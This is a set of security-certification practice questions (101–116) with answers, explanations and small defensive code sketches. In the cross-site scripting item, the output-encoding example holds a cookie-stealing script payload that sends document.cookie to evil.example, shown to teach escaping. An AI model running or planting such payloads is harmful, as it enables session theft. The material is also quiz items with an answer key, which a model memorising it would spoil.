Question 101
Which of the following best defines a honeypot in cybersecurity?
A) A decoy system designed to attract attackers
B) A firewall that filters malicious traffic
C) A backup server for disaster recovery
D) A secure VPN gateway
Answer: A) A decoy system designed to attract attackers
Explanation:
A honeypot is a deliberately designed system or network resource that appears vulnerable or valuable to cyber attackers, with the primary goal of attracting malicious activity in a controlled and monitored environment. By enticing attackers away from production systems, honeypots allow organizations to observe, record, and analyze attack techniques, malware behavior, and intrusion strategies without endangering critical assets. They provide a safe sandbox for studying real-world threats, improving situational awareness, and enhancing overall cybersecurity defenses.
Honeypots can be classified as low-interaction or high-interaction. Low-interaction honeypots simulate limited services or protocols, providing basic interaction to detect automated attacks or reconnaissance attempts. High-interaction honeypots, on the other hand, replicate full system environments, enabling detailed observation of attacker behavior, lateral movement, and exploitation tactics. The choice of honeypot type depends on organizational goals, risk tolerance, and resources available for monitoring and analysis.
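A low-interaction honeypot of the kind described above can be sketched with nothing more than a socket listener that logs each connection attempt and presents a fake service banner. The port choice, banner string, and in-memory event log below are illustrative assumptions, not a production design (real deployments add isolation, persistent logging, and alerting):

```python
import socket
import threading
from datetime import datetime, timezone

events = []  # in-memory log of connection attempts (stand-in for a real SIEM feed)

# Bind to an ephemeral port so the sketch runs anywhere.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))
srv.listen(1)
port = srv.getsockname()[1]

def serve_once():
    """Accept one connection, log it, and present a vulnerable-looking decoy banner."""
    conn, addr = srv.accept()
    events.append({"time": datetime.now(timezone.utc).isoformat(), "peer": addr[0]})
    conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # fake SSH banner to entice attackers
    conn.close()

t = threading.Thread(target=serve_once)
t.start()

# Simulate an attacker probing the decoy service.
c = socket.create_connection(("127.0.0.1", port), timeout=5)
received = c.recv(64)
c.close()
t.join(timeout=5)
print(received.decode().strip(), "| connections logged:", len(events))
```

Every probe against the decoy produces a log entry with no risk to production systems, which is exactly the observation value the explanation describes.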
Effective deployment requires careful planning, including proper network isolation, monitoring, and logging, to ensure that attackers cannot leverage the honeypot as a launching point to compromise real systems. Data gathered from honeypots contributes to threat intelligence, helping security teams identify new vulnerabilities, malware signatures, and attack patterns. This information can then be used to strengthen firewalls, intrusion detection systems, endpoint protections, and incident response procedures.
Beyond defensive applications, honeypots also serve as proactive early warning systems, alerting organizations to potential attacks before critical assets are targeted. By combining careful placement, rigorous monitoring, and strategic analysis, honeypots support research, training, and continuous improvement of cybersecurity posture, providing organizations with actionable insights while reducing risk exposure in the digital environment.
Question 102
Which of the following best describes a warm site in disaster recovery planning?
A) A site with no pre-installed hardware or data
B) A fully operational backup site ready for immediate use
C) A site with basic infrastructure and partial pre-installed systems
D) A mobile temporary recovery facility
Answer: C) A site with basic infrastructure and partial pre-installed systems
Explanation:
A warm site is a disaster recovery facility that provides an intermediate level of preparedness between a hot site and a cold site. It is equipped with essential infrastructure, including pre-installed hardware, software, and network configurations, but does not typically maintain up-to-date live data. Unlike cold sites, which require full installation and configuration during an incident, warm sites allow organizations to restore operations more quickly because core systems are already in place, significantly reducing downtime for critical business functions.
To ensure readiness, organizations often replicate key data and configurations to the warm site on a regular basis, using backup schedules aligned with Recovery Point Objectives (RPOs). This enables restoration of recent information and supports continuity in line with defined Recovery Time Objectives (RTOs). While warm sites are not as immediately operational as hot sites, they offer a cost-effective solution for organizations that require faster recovery than cold sites can provide but cannot justify the expense of a fully mirrored hot site.
Effective use of a warm site requires thorough planning, including clear activation procedures, defined roles and responsibilities, and documented processes for bringing systems online. Regular testing and simulation exercises are critical to verify that hardware, software, and network components function as expected and that personnel are familiar with recovery protocols. Testing also helps identify gaps, update documentation, and refine coordination between primary and recovery sites.
By combining pre-configured infrastructure, periodic data replication, and procedural readiness, warm sites strike a balance between cost, efficiency, and operational resilience. They are an integral part of comprehensive disaster recovery and business continuity strategies, ensuring that organizations can resume critical operations in a timely manner while minimizing disruption and financial or reputational losses.
Question 103
Which security principle focuses on giving users the minimum access necessary to perform their tasks?
A) Separation of duties
B) Least privilege
C) Need-to-know
D) Role-based access control
Answer: B) Least privilege
Explanation:
The principle of least privilege is a fundamental security concept that ensures users, applications, and processes are granted only the minimum access rights necessary to perform their assigned tasks. By restricting permissions to what is strictly required, organizations reduce the risk of accidental or deliberate misuse of sensitive systems, data, and resources. This principle not only protects critical assets but also limits the potential damage from compromised accounts or malware infections, thereby reducing the attack surface.
Implementing least privilege is crucial in preventing privilege escalation attacks, where unauthorized users exploit elevated permissions to gain broader access, and in mitigating insider threats by ensuring employees cannot access information or systems outside their responsibilities. The principle is commonly enforced through access control mechanisms such as role-based access control (RBAC), attribute-based access control (ABAC), and fine-grained access policies, as well as through automated identity and access management (IAM) systems that provision, modify, and revoke permissions systematically.
Maintaining least privilege requires ongoing review, monitoring, and auditing to ensure that access rights remain aligned with users’ current roles and responsibilities. Changes in job functions, project assignments, or departmental structures must trigger updates to permissions to avoid unnecessary exposure. Additionally, temporary or elevated access should be tightly controlled and monitored, with clear expiration policies and logging for accountability.
By consistently applying the principle of least privilege, organizations strengthen their overall security posture while supporting operational efficiency and accountability. It not only helps protect sensitive information and critical systems but also supports regulatory compliance and security frameworks, including NIST, ISO 27001, and PCI DSS. Ultimately, least privilege is a proactive strategy that enforces disciplined access management, minimizes risk, and enhances organizational resilience against both internal and external threats.
Question 104
Which of the following is the primary purpose of a digital signature?
A) Encrypting sensitive data
B) Authenticating the sender and ensuring data integrity
C) Compressing large files
D) Masking user identities
Answer: B) Authenticating the sender and ensuring data integrity
Explanation:
A digital signature is a cryptographic mechanism that provides authentication of the sender and ensures the integrity of a message, document, or transaction. By using asymmetric cryptography, the sender creates a signature with their private key, which can then be verified by recipients using the corresponding public key. This process guarantees that the message genuinely originates from the claimed sender and that its contents have not been altered during transmission, providing both authenticity and integrity.
Digital signatures also support non-repudiation, meaning that the sender cannot deny having sent the message, making them legally and operationally significant in sensitive communications. They are extensively used across multiple domains, including secure email (S/MIME), software distribution to verify code authenticity, financial transactions to validate agreements, and legal documents where proof of origin and integrity is essential.
The effectiveness of digital signatures relies heavily on proper key management. Private keys must be securely stored and protected from unauthorized access, while public keys should be distributed through trusted channels or digital certificates issued by Certificate Authorities (CAs). Standards such as RSA (Rivest-Shamir-Adleman), DSA (Digital Signature Algorithm), and ECDSA (Elliptic Curve Digital Signature Algorithm) provide robust frameworks for generating and verifying signatures.
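The sign-with-private-key, verify-with-public-key flow can be illustrated with a toy textbook-RSA scheme over a SHA-256 digest. The small Mersenne-prime key below is purely pedagogical; real systems use vetted libraries with padded schemes such as RSA-PSS or ECDSA and much larger keys:

```python
import hashlib

# Toy RSA signature for illustration only; never use raw RSA or keys this small.
p = 2147483647                       # 2^31 - 1 (Mersenne prime)
q = 2305843009213693951              # 2^61 - 1 (Mersenne prime)
n = p * q                            # public modulus
e = 17                               # public exponent
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent (kept secret)

def sign(message: bytes) -> int:
    """Sign the SHA-256 digest of the message with the private key."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(digest, d, n)

def verify(message: bytes, signature: int) -> bool:
    """Recover the digest with the public key and compare against a fresh hash."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == digest

sig = sign(b"wire $100 to Alice")
print(verify(b"wire $100 to Alice", sig))   # True: authentic and unmodified
print(verify(b"wire $900 to Alice", sig))   # False: any alteration breaks verification
```

The second check is what delivers integrity: changing even one character of the message changes its digest, so the signature no longer verifies, and only the private-key holder could have produced a signature that verifies at all.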
Incorporating digital signatures into organizational workflows strengthens cybersecurity by preventing tampering, impersonation, and fraud. They play a critical role in modern secure communication frameworks, supporting trust, compliance, and accountability. By ensuring the authenticity, integrity, and non-repudiation of digital interactions, digital signatures help organizations maintain secure, verifiable, and legally defensible communication and transaction processes in an increasingly digital environment.
Question 105
Which type of malware is designed to replicate itself and spread to other systems?
A) Trojan
B) Worm
C) Spyware
D) Ransomware
Answer: B) Worm
Explanation:
A worm is a type of self-replicating malware that spreads autonomously across networks or systems without requiring any user interaction. Unlike Trojans, which rely on social engineering or the execution of malicious files by users, worms exploit vulnerabilities in operating systems, applications, or network protocols to propagate automatically. This autonomous behavior allows worms to infect large numbers of devices rapidly, making them particularly dangerous to organizational networks and critical infrastructure.
The impact of worm infections can be significant. They often consume network bandwidth, degrade system performance, and create opportunities for secondary attacks by delivering additional payloads such as backdoors, spyware, or ransomware. Some worms are also designed to harvest sensitive information, further increasing the potential damage. Due to their ability to spread without user intervention, worms can cause outbreaks that escalate quickly, making early detection and containment essential.
Effective defense against worms involves a combination of technical and procedural measures. Regular patch management ensures that known vulnerabilities exploited by worms are closed, while firewalls and intrusion detection or prevention systems (IDS/IPS) help identify and block suspicious network traffic. Endpoint security solutions, including antivirus and behavioral monitoring, can detect and quarantine worm activity on individual devices. User awareness, though less critical than with Trojans, remains important for limiting potential infection vectors such as email attachments or removable media.
Studying worm behavior also contributes to stronger incident response and threat mitigation strategies, enabling organizations to anticipate propagation methods and implement targeted containment measures. By combining proactive security practices with continuous monitoring, organizations can minimize the risk of widespread worm infections, protect critical systems, and maintain operational resilience against fast-spreading malware threats.
Question 106
Which security model focuses on maintaining the integrity of information through strict rules on transactions and auditing?
A) Bell-LaPadula
B) Clark-Wilson
C) Biba
D) Brewer and Nash
Answer: B) Clark-Wilson
Explanation:
The Clark-Wilson security model is designed to ensure data integrity within commercial and business systems by enforcing well-formed transactions and maintaining strict separation of duties. Unlike models that prioritize confidentiality, such as Bell-LaPadula, Clark-Wilson focuses on the accuracy, consistency, and trustworthiness of data, making it particularly suitable for financial, banking, and enterprise resource management systems where operational integrity is critical.
At the core of the model are Transformation Procedures (TPs), which are authorized programs that are the only means by which data can be modified. All operations performed through TPs must follow defined business rules and are subject to Integrity Verification Procedures (IVPs) that confirm correctness and consistency. This dual mechanism ensures that data cannot be altered arbitrarily or maliciously, reducing the risk of errors, fraud, or unauthorized modifications.
Clark-Wilson also enforces the principle of separation of duties by requiring that no single individual has unrestricted control over sensitive operations. Certification and enforcement rules define which users and programs are authorized to perform specific transactions, preventing conflicts of interest and maintaining accountability. Auditing procedures further enhance security by tracking and logging all operations, allowing organizations to detect suspicious activity, investigate incidents, and demonstrate compliance with regulatory requirements.
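The TP/IVP relationship can be sketched as follows: constrained data items (here, account balances) may only change through a well-formed transaction, and an integrity check confirms the system's invariant after every change. The account names and balance invariant are illustrative assumptions:

```python
# Sketch of Clark-Wilson concepts: the accounts dict holds constrained data items (CDIs),
# tp_transfer is the only Transformation Procedure allowed to modify them, and ivp() is
# the Integrity Verification Procedure confirming the data is in a valid state.

accounts = {"checking": 500, "savings": 500}   # CDIs
TOTAL = 1000                                   # invariant: funds move, never appear or vanish

def ivp() -> bool:
    """Integrity Verification Procedure: confirm the books balance."""
    return sum(accounts.values()) == TOTAL and all(v >= 0 for v in accounts.values())

def tp_transfer(src: str, dst: str, amount: int) -> None:
    """Transformation Procedure: a well-formed transaction preserving the invariant."""
    if amount <= 0 or accounts[src] < amount:
        raise ValueError("transaction not well-formed")
    accounts[src] -= amount
    accounts[dst] += amount
    assert ivp(), "IVP failed: integrity violated"

tp_transfer("checking", "savings", 200)
print(accounts, ivp())   # {'checking': 300, 'savings': 700} True
```

Direct writes to `accounts` would bypass the model; in a real Clark-Wilson implementation the access control layer certifies that only authorized TPs can touch CDIs at all.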
By integrating rigorous verification, controlled access, and comprehensive auditing, the Clark-Wilson model ensures that business processes remain secure, reliable, and auditable. Proper implementation strengthens organizational trust, safeguards critical data, and supports regulatory compliance, ultimately reducing the risk of operational disruptions and fraudulent activity while enhancing overall system resilience.
Question 107
Which of the following is an example of multifactor authentication?
A) Password only
B) Smart card plus PIN
C) Username and password
D) Security question only
Answer: B) Smart card plus PIN
Explanation:
Multifactor Authentication (MFA) is a security mechanism that requires users to provide two or more independent forms of verification before gaining access to systems, applications, or data. The verification factors are typically categorized into three types: something the user knows (like a password or PIN), something the user has (such as a smart card, security token, or mobile device), and something the user is (biometric identifiers such as fingerprints, facial recognition, or iris scans). By requiring multiple factors, MFA significantly strengthens authentication, making it far more difficult for attackers to gain unauthorized access, even if one factor, such as a password, is compromised.
A common example of MFA is the combination of a smart card with a PIN, which requires both possession of the card and knowledge of the correct PIN to authenticate successfully. MFA is widely deployed in high-security environments such as online banking, enterprise networks, cloud platforms, and government systems. Modern implementations often incorporate risk-based or adaptive authentication, dynamically adjusting verification requirements based on contextual factors like device type, geographic location, login patterns, or unusual behavior.
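A widely deployed possession factor is the time-based one-time password (TOTP) generated by an authenticator app or hardware token. The algorithm, standardized in RFC 6238, is short enough to sketch with the standard library; the shared secret below is the RFC's published test key, not a real credential:

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time-step counter, dynamically truncated."""
    counter = struct.pack(">Q", for_time // step)          # 8-byte big-endian time step
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                # dynamic truncation offset
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

# RFC 6238 Appendix B test vector: secret "12345678901234567890", time 59s, 8 digits.
print(totp(b"12345678901234567890", 59, digits=8))   # 94287082
```

Because the code is derived from a secret held by the device and the current time window, it proves possession of the device; paired with a PIN or password, the two factors together form MFA.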
Beyond preventing unauthorized access, MFA supports regulatory compliance with frameworks such as NIST SP 800-63, ISO 27001, and PCI DSS. It also reduces the risk of phishing, credential theft, and brute-force attacks while enhancing user trust in digital services. Organizations implementing MFA benefit from a layered security approach, ensuring that access control policies remain robust even as threat landscapes evolve.
Ultimately, MFA is a critical component of modern cybersecurity strategies, combining usability with strong protection to safeguard sensitive information and maintain the integrity of digital systems, while also promoting a proactive security culture across users and administrators alike.
Question 108
Which of the following defines a Recovery Point Objective (RPO)?
A) The maximum tolerable downtime of a system
B) The targeted time to restore a system after failure
C) The acceptable amount of data loss measured in time
D) The mean time between failures
Answer: C) The acceptable amount of data loss measured in time
Explanation:
The Recovery Point Objective (RPO) defines the maximum acceptable amount of data loss that an organization can tolerate in the event of a disruption or disaster, expressed as a time interval. It serves as a key metric in business continuity and disaster recovery planning, helping organizations determine how frequently data should be backed up or replicated to minimize potential loss. For instance, if a system has an RPO of four hours, backups or replication processes must occur at least every four hours so that, in the event of a failure, no more than four hours of data is lost.
RPO plays a critical role in shaping backup strategies, influencing the selection of technologies and solutions such as on-site backups, offsite replication, snapshots, or cloud-based backup services. Systems and applications with high criticality typically require lower RPOs, meaning more frequent backups, while less critical systems may tolerate longer intervals. Organizations must also consider regulatory compliance requirements, industry standards, and operational risk tolerance when defining RPOs.
Establishing an appropriate RPO ensures that data protection measures align with business objectives and that recovery strategies can effectively limit disruption. In practice, it works in conjunction with the Recovery Time Objective (RTO), which specifies how quickly systems must be restored, to provide a complete framework for resilience planning.
Regularly reviewing and updating RPOs is essential, as business operations, technology environments, and threat landscapes evolve. By continuously aligning data protection objectives with organizational priorities, companies can reduce financial, operational, and reputational risks associated with data loss while ensuring that critical information remains available and recoverable when needed.
Question 109
Which of the following best describes a zero-day vulnerability?
A) A vulnerability that has been publicly disclosed and patched
B) A vulnerability unknown to vendors and with no available patch
C) A vulnerability that affects only legacy systems
D) A vulnerability that has been exploited after patching
Answer: B) A vulnerability unknown to vendors and with no available patch
Explanation:
A zero-day vulnerability is a security flaw in software or hardware that is unknown to the vendor and for which no official patch or fix exists at the time of discovery. Because the vulnerability has not been publicly disclosed or addressed, attackers can exploit it to gain unauthorized access, steal sensitive data, disrupt services, or compromise systems before any defensive measures can be implemented. The term “zero-day” highlights that the vendor has had zero days to respond to the issue, making these vulnerabilities particularly dangerous and highly sought after by cybercriminals and threat actors.
Protecting against zero-day vulnerabilities requires a proactive, multi-layered security strategy. This includes deploying intrusion detection and prevention systems, behavior-based and anomaly monitoring, network segmentation, endpoint protection, and threat intelligence feeds to identify unusual activity. Organizations should also implement robust patch management processes to quickly apply updates once fixes become available. Additionally, employee awareness and strong access controls can limit the potential impact of an exploit.
Having a well-defined incident response plan is critical for minimizing damage from zero-day attacks. Continuous monitoring, regular security assessments, and rapid response capabilities help organizations detect, contain, and remediate incidents effectively. By combining technical defenses, strategic planning, and employee vigilance, organizations can reduce their exposure to zero-day threats and enhance their overall cybersecurity resilience, even against previously unknown attack vectors.
Question 110
Which type of firewall examines the state of active connections and makes decisions based on connection context?
A) Packet-filtering firewall
B) Stateful inspection firewall
C) Proxy firewall
D) Next-generation firewall
Answer: B) Stateful inspection firewall
Explanation:
A stateful inspection firewall, also known as a dynamic packet-filtering firewall, is a network security device that monitors active connections and makes filtering decisions based on the state and context of network traffic. Unlike traditional packet-filtering firewalls, which inspect each packet individually without considering its relationship to other packets, stateful firewalls maintain session information, including source and destination IP addresses, ports, protocol types, and the current state of the connection. This enables them to distinguish between legitimate traffic that is part of an established session and potentially malicious traffic attempting to bypass security controls.
By tracking the state of active sessions, stateful inspection firewalls can enforce more granular security policies and detect abnormal patterns indicative of attacks, such as spoofed packets, unauthorized connection attempts, or session hijacking. They are also effective against certain types of Denial-of-Service (DoS) attacks by monitoring the number and behavior of ongoing connections and applying threshold-based controls to mitigate overload.
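The core of the session-tracking logic is a connection table: outbound traffic creates an entry, and an inbound packet is admitted only if it matches the reverse of an established entry. The addresses and verdict strings below are illustrative, and real firewalls track far more state (protocol, TCP flags, timeouts):

```python
# Toy stateful filter: outbound connections create session entries; inbound packets
# are allowed only if they reverse an existing session tuple.

sessions = set()   # established connections, keyed by (src, sport, dst, dport)

def outbound(src, sport, dst, dport):
    """Record an internally initiated connection in the session table."""
    sessions.add((src, sport, dst, dport))
    return "ALLOW"

def inbound(src, sport, dst, dport):
    """Admit inbound traffic only as a reply to a tracked session."""
    if (dst, dport, src, sport) in sessions:
        return "ALLOW"
    return "DROP"   # unsolicited traffic: no matching connection state

outbound("10.0.0.5", 51000, "93.184.216.34", 443)
print(inbound("93.184.216.34", 443, "10.0.0.5", 51000))   # ALLOW: reply to our request
print(inbound("203.0.113.9", 443, "10.0.0.5", 51000))     # DROP: no session exists
```

A stateless packet filter would need a standing rule permitting all inbound port-443 traffic to reach the reply; the session table lets the stateful firewall admit only the specific reply it expects.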
Stateful firewalls are commonly deployed at the perimeter of enterprise networks, between internal subnets, and at points of connection to external networks. Their ability to maintain session tables and monitor traffic context allows them to provide a balance between strong security and efficient traffic flow, ensuring that authorized communications are not unnecessarily blocked.
In addition to session monitoring, many stateful firewalls incorporate features such as network address translation (NAT), virtual private network (VPN) support, and intrusion prevention capabilities, further enhancing network protection. Regular updates, proper configuration, and integration with other security measures are essential to maximize effectiveness. By combining traffic awareness, contextual filtering, and active monitoring, stateful inspection firewalls form a critical layer in modern network defense strategies.
Question 111
Which of the following best describes a disaster recovery plan (DRP)?
A) A plan to prevent cyberattacks
B) A strategy for restoring systems and data after a disruptive event
C) A compliance audit schedule
D) A physical security inspection procedure
Answer: B) A strategy for restoring systems and data after a disruptive event
Explanation:
A Disaster Recovery Plan (DRP) is a structured set of procedures designed to restore IT systems, applications, and data following disruptions such as natural disasters, cyberattacks, hardware failures, or human errors. The primary goal of a DRP is to ensure that critical systems can be recovered efficiently, minimizing downtime and reducing the impact on business operations.
A comprehensive DRP identifies essential systems and data, defines recovery priorities, specifies backup and restoration strategies, and outlines communication protocols during an incident. It also assigns clear roles and responsibilities to IT staff and other stakeholders, ensuring that everyone knows their tasks during a recovery scenario. Integration with a Business Continuity Plan (BCP) is common, providing a holistic approach to maintaining or quickly resuming essential business functions alongside IT recovery efforts.
Regular testing, such as tabletop exercises or full-scale simulations, is critical to verify the plan’s effectiveness and identify gaps in procedures, infrastructure, or personnel readiness. DRPs must also be periodically updated to reflect changes in technology, applications, regulatory requirements, and emerging threats.
An effective DRP not only restores systems and data but also helps organizations reduce financial losses, maintain compliance with legal or industry regulations, and sustain trust among customers, partners, and employees. By proactively planning for disruptive events, organizations enhance operational resilience, ensure continuity of critical services, and reinforce their ability to respond to and recover from incidents in a controlled and timely manner.
Question 112
Which type of attack involves an attacker inserting malicious scripts into trusted websites viewed by other users?
A) Cross-site scripting (XSS)
B) SQL injection
C) Man-in-the-middle attack
D) Phishing
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting (XSS) attacks occur when an attacker injects malicious scripts into a trusted website, which are then executed in the browsers of unsuspecting users. These scripts can steal session cookies, manipulate page content, perform unauthorized actions on behalf of the user, or redirect visitors to malicious sites. XSS attacks exploit vulnerabilities in web applications, typically arising from improper input validation, insufficient output encoding, or insecure handling of user-generated content.
There are three main types of XSS attacks. Reflected XSS occurs when user-supplied input is immediately returned by the web server without proper sanitization. Stored XSS involves injecting malicious scripts that are permanently saved on the server, such as in databases or forums, and served to multiple users. DOM-based XSS happens when client-side scripts manipulate the Document Object Model in unsafe ways, allowing malicious input to execute within the user’s browser.
Mitigation strategies include rigorous input validation, context-aware output encoding, implementing Content Security Policies (CSPs), and following secure development practices throughout the application lifecycle. Regular security testing, such as penetration testing and code reviews, also helps identify potential XSS vulnerabilities before attackers can exploit them.
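The output-encoding mitigation can be shown in a few lines: interpolating raw user input into HTML executes any embedded script, while context-aware encoding renders the same input inert. The comment string and page fragment below are contrived examples:

```python
import html

# Hypothetical attacker-supplied comment containing a cookie-stealing script.
comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Unsafe: raw interpolation ships the script to every visitor's browser.
unsafe = f"<p>{comment}</p>"

# Safer: HTML-entity encoding turns markup characters into harmless text.
safe = f"<p>{html.escape(comment)}</p>"
print(safe)
```

Encoding must match the output context (HTML body, attribute, JavaScript, URL); `html.escape` covers only the HTML-body case, which is why the text recommends context-aware encoding alongside input validation and CSP rather than any single control.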
Understanding XSS is crucial for maintaining web application security. By effectively preventing and mitigating these attacks, organizations protect user data, preserve trust in their online platforms, and reduce the risk of reputational damage, financial loss, or regulatory penalties. Proper awareness and proactive measures form an essential component of a robust cybersecurity posture for modern web applications.
Question 113
Which of the following is a core principle of the Biba security model?
A) Preventing unauthorized disclosure of information
B) Maintaining data integrity by preventing unauthorized modification
C) Ensuring system availability during attacks
D) Enforcing separation of duties
Answer: B) Maintaining data integrity by preventing unauthorized modification
Explanation:
The Biba security model is a formal framework designed to preserve data integrity, ensuring that information remains accurate, consistent, and trustworthy throughout its entire lifecycle. Unlike models such as Bell-LaPadula, which primarily focus on maintaining confidentiality, Biba emphasizes protecting data from unauthorized or improper modification. It does this by enforcing two main rules: no write up, which prevents subjects—such as users or processes—from writing to objects at higher integrity levels, and no read down, which prevents subjects from reading data at lower integrity levels. These rules control the flow of information, ensuring that high-integrity data cannot be compromised by lower-integrity or less reliable sources.
The Biba model is especially important in environments where the accuracy and reliability of information are critical. In financial systems, for example, it ensures that accounting records, transaction logs, and other sensitive data cannot be altered by unverified processes or applications, protecting against fraud and errors. In industrial control and safety-critical systems, it helps maintain the integrity of sensor readings, operational logs, and control commands, preventing corrupted data from leading to unsafe decisions or system failures. Healthcare systems and scientific research also rely on Biba principles to ensure the accuracy of medical records, laboratory results, and experimental data, supporting reliable diagnoses, treatments, and research outcomes. By controlling how data can be accessed and modified, the Biba model provides a structured approach to safeguarding the trustworthiness of critical information across diverse domains, making it a cornerstone of integrity-focused security practices.
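The two Biba rules reduce to simple comparisons on integrity levels. The level names and ordering below are illustrative assumptions; only the direction of the inequalities comes from the model:

```python
# Integrity levels: higher number means higher integrity (labels are illustrative).
LEVELS = {"untrusted": 0, "user": 1, "system": 2}

def can_read(subject_level: str, object_level: str) -> bool:
    """Biba 'no read down': a subject may not read lower-integrity data."""
    return LEVELS[object_level] >= LEVELS[subject_level]

def can_write(subject_level: str, object_level: str) -> bool:
    """Biba 'no write up': a subject may not write to higher-integrity data."""
    return LEVELS[object_level] <= LEVELS[subject_level]

print(can_read("system", "untrusted"))   # False: corrupt input cannot flow upward
print(can_write("user", "system"))       # False: a user cannot taint system data
print(can_write("system", "user"))       # True: high integrity may write down
```

Note the inequalities are the mirror image of Bell-LaPadula's confidentiality rules, which is the standard way the two models are contrasted.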
Question 114
Which of the following describes social engineering attacks?
A) Exploiting software vulnerabilities
B) Manipulating people to gain unauthorized access
C) Deploying ransomware
D) Network packet sniffing
Answer: B) Manipulating people to gain unauthorized access
Explanation:
Social engineering attacks exploit human psychology rather than technical vulnerabilities to gain unauthorized access to systems, sensitive information, or organizational resources. Instead of targeting software flaws or network weaknesses, attackers manipulate natural human tendencies such as trust, fear, curiosity, urgency, or helpfulness to deceive individuals into revealing credentials, granting system access, or performing actions that compromise security. Common social engineering techniques include phishing emails that appear legitimate but contain malicious links or attachments, pretexting, in which attackers fabricate convincing scenarios to extract sensitive information, baiting with enticing offers or rewards, tailgating to gain unauthorized physical access to restricted areas, and direct impersonation of trusted personnel such as IT staff or executives.
These attacks are particularly effective because humans often represent the weakest link in otherwise strong technical security measures. Even in organizations with firewalls, intrusion detection systems, and robust encryption, an unsuspecting employee who falls for a persuasive pretext or clickbait email can inadvertently expose sensitive data or create access points for attackers. Real-world examples include spear-phishing campaigns targeting corporate executives to steal confidential documents, phone scams to obtain authentication codes, fraudulent IT support requests that trick users into installing malware, or deceptive social media interactions designed to harvest personal information. As organizations increasingly rely on digital systems and remote work, the threat of social engineering continues to grow, emphasizing the need for comprehensive employee training, awareness programs, and verification procedures to mitigate human-targeted security risks effectively.
Question 115
Which type of attack captures network traffic to intercept sensitive information?
A) Replay attack
B) Sniffing
C) Brute-force attack
D) Denial-of-service attack
Answer: B) Sniffing
Explanation:
Sniffing is a network attack technique used to capture and analyze network traffic with the goal of extracting sensitive information such as usernames, passwords, session tokens, or other confidential data. Attackers employ packet sniffers, which are specialized tools or software, to monitor the flow of data over networks. Sniffing can target various types of communication channels, including local area networks (LANs), Wi-Fi networks, or other network infrastructures, especially when the transmitted data is unencrypted.
There are two main types of sniffing: passive and active. Passive sniffing involves quietly observing network traffic without altering it, making it difficult for victims to detect. This method is often employed on networks where traffic naturally passes through a central point, such as a hub or wireless access point. Active sniffing, on the other hand, involves manipulating or redirecting network traffic to capture more sensitive information or gain unauthorized access. Techniques such as ARP spoofing or man-in-the-middle attacks are commonly used in active sniffing to intercept communications between devices.
To mitigate the risks associated with sniffing attacks, organizations should implement robust security measures. Encryption protocols like TLS (Transport Layer Security) or SSL (Secure Sockets Layer) protect data in transit, ensuring that intercepted traffic remains unreadable to attackers. Network segmentation and the use of virtual private networks (VPNs) can further limit exposure by isolating sensitive communications. Additionally, continuous network monitoring and anomaly detection help identify unusual patterns indicative of sniffing attempts.
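As a minimal illustration of the TLS mitigation above, Python's standard `ssl` module enables certificate verification and hostname checking by default when a context is created the recommended way; the sketch simply confirms those defaults and pins a minimum protocol version.

```python
import ssl

# Sketch of client-side TLS hygiene using the standard library:
# create_default_context() turns on certificate verification and
# hostname checking, which keeps intercepted traffic unreadable.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy protocols

# Verification is on by default; disabling these settings would
# reintroduce exposure to sniffing and interception.
print(context.check_hostname)                     # True
print(context.verify_mode == ssl.CERT_REQUIRED)   # True
```

Weakening either setting (for example, setting `verify_mode` to `CERT_NONE` to silence certificate errors) is a common misconfiguration that hands sniffers readable traffic again.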
Sniffing attacks underscore the critical importance of maintaining secure communication channels, applying strong encryption, and ensuring network visibility. By combining these strategies, organizations can effectively protect sensitive data, maintain confidentiality, and reduce the risk of unauthorized access caused by network traffic interception.
Question 116
Which of the following access control models combines both discretionary and mandatory controls based on rules and policies?
A) Bell-LaPadula
B) Role-Based Access Control (RBAC)
C) Lattice-based model
D) Hybrid access control model
Answer: D) Hybrid access control model
Explanation:
A hybrid access control model integrates elements of both discretionary access control (DAC) and mandatory access control (MAC) to provide a more flexible and secure approach to managing access to resources. In DAC, resource owners have the authority to set permissions and grant or revoke access to users at their discretion. This approach offers flexibility and ease of management for routine operations, allowing individuals to manage their own files or applications without extensive administrative oversight. However, DAC alone may not provide sufficient protection for highly sensitive data, as it relies heavily on the judgment of individual users.
MAC, in contrast, enforces system-wide access policies based on classification labels or security levels assigned to users and resources. These policies are mandatory and cannot be altered by individual users, ensuring that sensitive information is protected according to organizational standards and compliance requirements. MAC is particularly effective for environments where data confidentiality and integrity are critical, such as government, military, or financial institutions.
By combining DAC and MAC, hybrid access control models allow organizations to balance flexibility with strict security enforcement. They enable granular access control decisions that take into account user roles, data sensitivity, and organizational policies. Administrators can define overarching security policies for critical resources while still permitting resource owners to manage day-to-day access for less sensitive information. This approach not only enhances security and prevents unauthorized disclosure or modification of critical assets but also supports regulatory compliance and operational efficiency.
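A toy sketch can make the layering concrete: a mandatory label check is evaluated first and cannot be overridden, and only then is the owner-managed discretionary ACL consulted. The labels, users, and ACL below are invented purely for illustration.

```python
# Toy sketch of a hybrid access decision: MAC (classification labels,
# non-overridable) is checked first, then DAC (owner-managed ACL).
# All names and labels here are invented for illustration.

LEVELS = {"public": 0, "internal": 1, "secret": 2}

def can_read(user_clearance: str, resource_label: str,
             acl: set, user: str) -> bool:
    # MAC: the user's clearance must dominate the resource's label.
    if LEVELS[user_clearance] < LEVELS[resource_label]:
        return False
    # DAC: the resource owner must also have granted this user access.
    return user in acl

acl = {"alice", "bob"}  # owner-maintained discretionary grant list
print(can_read("secret", "internal", acl, "alice"))    # True  (passes both)
print(can_read("public", "internal", acl, "alice"))    # False (MAC denies)
print(can_read("secret", "internal", acl, "mallory"))  # False (DAC denies)
```

The ordering matters: because the MAC check runs first and returns unconditionally on failure, no discretionary grant by an owner can leak data above a user's clearance.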
